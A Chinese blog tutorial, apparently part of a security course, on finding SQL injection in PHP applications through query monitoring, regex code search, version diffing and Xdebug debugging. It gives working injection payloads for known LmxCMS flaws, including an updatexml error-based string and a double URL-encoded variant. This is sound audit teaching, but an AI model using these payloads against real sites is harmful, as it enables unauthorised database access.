第81天: 代码审计-PHP 项目&MVC 注入&CNVD 拿 1day&SQL监控&动态调试

最新推荐文章于 2024-05-23 20:06:02 发布
最新推荐文章于 2024-05-23 20:06:02 发布
阅读量1.1k 收藏 6
点赞数 17
文章标签: sql 数据库 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/138576573
版权

目录

前置知识

正则表达式挖掘思路(通用漏洞思路)

功能点挖掘思路(通用漏洞思路)

案例一:数据库监控-QQ 业务源码系统-(无过滤)

案例二:正则表达式-Bluecms 源码系统-(无过滤)

案例三: CNVD 拿 1DAY-梦想 CMS 源码系统-(有过滤)

梦想 CMS 后台 Bo***.cl***.php 文件存在 SQL 注入漏洞

LmxCMS V1.4 前台 Ta***.cl***.php 存在 SQL 注入漏洞

​案例四:两种代码审计的思路

文件对比技术

动态调试技术 

前置知识

正则表达式挖掘思路(通用漏洞思路)

功能点挖掘思路(通用漏洞思路)

案例一:数据库监控-QQ 业务源码系统-(无过滤)

效率高但是只针对sql注入

源码部署以后,利用代码审计的数据库监控程序

导入项目进行语句查找,like后面的数据得删掉,因为ip不在里面写,是数据包中导入的ip是从这个函数中得来的,全局搜索这个函数的来源

查找这个函数的来源

函数定位

看到这里就明白了可以进行xff注入

成功

后面就是正常的手工注入的流程

案例二:正则表达式-Bluecms 源码系统-(无过滤)

使用正则表达式过滤

(update|select|insert|delete|).*?where.*=

这里我用的的是vscode,点击目录,按住ctrl+shift+f,输入正则表达式

需要关注这种变量可以控制的

查看定义

 查看到了query函数

对用户输入没有进行完整的过滤

让sql语句输出出来,以此来方便调试

执行

sql注入无回显,可以利用延时注入

这里直接扔到sqlmap中

案例三: CNVD 拿 1DAY-梦想 CMS 源码系统-(有过滤)

mvc框架(各司其职)

梦想 CMS 后台 Bo***.cl***.php 文件存在 SQL 注入漏洞

cnvd地址:https://www.cnvd.org.cn/flaw/show/CNVD-2020-59466

mvc框架访问方式

分析

id参数是由用户输入

终于看到了sql注入语句

让sql语句输出

触发sql语句

query函数里面执行sql语句里面有sql注入的报错语句,可以执行报错注入

测试payload

m=Book&a=reply&id=1)%20and%20updatexml(0,concat(0x7e,user()),1) --+

LmxCMS V1.4 前台 Ta***.cl***.php 存在 SQL 注入漏洞

cnvd地址:https://www.cnvd.org.cn/flaw/show/CNVD-2019-05674

查看该目录,发现有两个变量

查看函数定义

 存在的绕过点

sql注入点

继续跟踪查看到了sql注入语句

让sql语句输出

触发

 把sql注入语句进行两次url编码

注入

案例四:两种代码审计的思路

文件对比技术

利用软件beyond compare直接选择文件夹比较,把两个文件拖进去

这里下载了两个版本lmx,利用软件beyond compare,有颜色变化的就是做过修改的地方

这个文件

查看新旧版本在编写上的区别,从而推断出来旧版本的问题

动态调试技术 

配置参考文献:https://blog.csdn.net/nzjdsds/article/details/100114242

首先需要开启phpstudy的xedebug

然后再php.ini文末加入下面的代码

[XDebug]
xdebug.profiler_append = 0
;效能监测的设置开关
xdebug.profiler_enable = 1
xdebug.profiler_enable_trigger = 0
;profiler_enable设置为1的时候,效能监测信息写入文件所在的目录
xdebug.profiler_output_dir="D:\phpstudy\tmp\xdebug"
;设置的函数调用监测信息的输出路径
xdebug.trace_output_dir="D:\phpstudy\tmp\xdebug"
;生成的效能监测文件的名字
xdebug.profiler_output_name ="cache.out.%t-%s"
; IDE与XDebug协作
xdebug.remote_enable = 1
xdebug.remote_handler = "dbgp"
xdebug.remote_host = "127.0.0.1"
xdebug.remote_port = 9000
xdebug.idekey = phpstorm-xdebug
;.dll文件的路径
zend_extension="D:\phpstudy\PHPTutorial\php\php-5.4.45\ext\php_xdebug.dll"

配置phpstorm

配置端口

 

验证是否配置成功

下断点

执行后会自动启动页面

要触发data数据这里需要利用刚才的payload

m=tags&name=%25%36%31%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%37%35%25%37%30%25%36%34%25%36%31%25%37%34%25%36%35%25%37%38%25%36%64%25%36%63%25%32%38%25%33%30%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%31%25%32%39%25%32%33

往下执行可以看到执行到哪一步了,并且可以看到对应的变量和值

 

xiaojiesec
关注
  • 17
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java -jar HrmsTool.jar -d xxx
代码审计-PHP项目&MVC注入&CNVD1day&SQL监控&动态调试
siu~
09-25 358
1、审计漏洞-SQL数据库注入挖掘 1、审计思路-正则搜索&功能追踪&辅助工具 3、审计类型-常规架构&MVC架构&三方框架
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5288
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 翼创维awifi路由器存在多处未授权访问漏
代码审计-PHP模型开发篇&MVC层&RCE执行&文件对比法&1day分析&0day验证
siu~
04-29 386
1、PHP审计-MVC开发-RCE&代码执行 2、PHP审计-MVC开发-RCE&命令执行 3、PHP审计-MVC开发-RCE&文件对比
CNVD-2019-34241 SQL注入.MD
03-20
CNVD-2019-34241 SQL注入.MD
盘企LCMS的代码审计CNVD-2021-28469』1
08-03
盘企LCMS的代码审计CNVD-2021-28469』1
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
CNVD-C-2019-48814:CNVD-C-2019-48814 Weblogic wls9_async_response反序列化利用工具
03-16
CNVD-C-2019-48814
PostgreSQL常用的领域和用例
lee_vincent1的博客
05-21 917
PostgreSQL 因其丰富的功能、高可靠性和高度可扩展性,被广泛应用于各种领域,从企业级应用、数据仓库、物联网到科学研究和公共部门应用。通过使用各种扩展和优化技术,PostgreSQL 还能满足更高的性能需求和特定应用场景的要求。
OceanBase SQL 诊断和调优实践——【DBA从入门到实践】第七期
OceanBase分布式数据库的博客
05-20 1110
《DBA 从入门到实践》第七期在5月22日(周三)如期而至,为大家讲解:ODP(OceanBase Database Proxy) SQL 路由原理;如何分析 SQL 监控视图;如何阅读和管理 OceanBase SQL 执行计划;最常见的 SQL 调优方式;SQL 性能问题的典型场景和排查思路。
【Text2SQL 经典模型】TypeSQL
最新发布
VLyb
05-23 972
借助于数据库的 table schema 检索和 knowledge graph 的检索,为 question 的每个 word 标注一个 type,从而提高 embedding 的效果当 database content 可用时,type 标注时还会进一步对 column content 做检索,并为其标注 column name,这样当用户的 question 中的所提到的列名或者条目不精确时,也可以通过这个步骤来对应到具体的数据库 column,从而提高效果,实现所谓的“内容敏感性。
ssms执行建表后如何自动刷新所有SQL SERVER表
05-20 250
在 SSMS 中,前往“工具” > “选项” > “环境” > “键盘”,搜索“刷新对象资源管理器”,然后分配一个快捷键。请注意,自动刷新功能并不能保证在所有情况下都能正常工作,尤其是在 SSMS 启动时、网络问题或 SSMS 的 bug 导致刷新失败时。使用脚本自动化:如果你需要频繁创建表,可以写一个小型应用程序或脚本来自动执行创建表的操作并在每次执行后自动刷新对象资源管理器。使用脚本自动刷新:在你执行创建表的 T-SQL 脚本后,可以通过执行以下 SQL 命令来手动刷新对象资源管理器。
SQL面试题练习 —— 连续登录超过N用户(一)
hu_wei123的博客
05-21 251
现有用户登录日志表 t_login_log,包含用户ID(user_id),登录日期(login_date)。数据已经按照用户日期去重,请查出连续登录超过4的用户ID。
SQL常用基础语句(一)-- ABCDE开头
wodertianna的博客
05-22 1016
1:星期一 2:星期二 3:星期三 4:星期四 5:星期五 6:星期六 0:星期日。# 2:星期一 3:星期二 4:星期三 5:星期四 6:星期五 7:星期六 1:星期日。# 0:星期一 1:星期二 2:星期三 3:星期四 4:星期五 5:星期六 6:星期日。2)count(column)会对指定列具有的行数进行统计,除去值为NULL的行。#指定日期加1(可将DAY换为MONTH,YEAR来实现加1个月,1年)如果字段等于预期值,则返回结果1,否则返回结果2,end代表语句结束。
SQL】子查询
2301_77961281的博客
05-20 652
当需要在一个查询中使用另一个查询的结果时,可以使用子查询。例如,需要在一个查询中使用另一个查询的结果作为条件进行过滤数据。当需要在一个查询中进行聚合操作,但又需要使用另一个查询的结果进行比较或筛选时,可以使用子查询。当需要在一个查询中进行多个条件的比较,而这些条件需要使用另一个查询的结果来确定时,可以使用子查询。这样说很抽象直接看下面例题。
SqlSugar生成数据库和数据表
一杯浊酒笑风尘
05-19 145
SqlSugar生成数据库和数据表
SQL面试题练习 —— 满足连续5以上每上涨超过5%的股票
hu_wei123的博客
05-21 323
现有一张股票价格表stock_data有3个字段分别是股票代码(stock_code),日期(trade_date),收盘价格(closing_price) ,请找出满足连续5以上(含)每上涨超过5%的股票,并给出连续满足数及开始和结束日期。备注:不考虑停牌或其他情况,仅仅关注每连续5上涨超过5%的股票。
SQL——SELECT相关的题目
戏拈秃笔的博客
05-20 1100
……刷题中……
sql server怎么存储图片
cuisidong1997的博客
05-22 477
请注意,使用OPENROWSET和BULK操作需要具有相应的权限,并且可能受到安全限制,如服务器的配置和安全策略所影响。此外,从SQL Server 2016开始,推荐使用FILESTREAM存储二进制大对象数据,这样可以将文件存储直接integrated到SQL Server中,从而提供更好的性能和管理。在SQL Server中,可以使用VARBINARY数据类型来存储图片。以下是一个简单的例子,展示了如何将图片存储到数据库中,并从数据库中检索出来。sql server怎么存储图片。
vulfocus thinkphp 代码执行 (CNVD-2018-24942)
03-29
攻击者可以通过构造恶意的输入数据,利用该漏洞执行任意代码,从而控制服务器。 漏洞影响: ThinkPHP 5.0.x - 5.0.18 版本 ThinkPHP 5.1.x - 5.1.0-beta.5 版本 漏洞利用: 攻击者可以通过在URL中添加参数,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值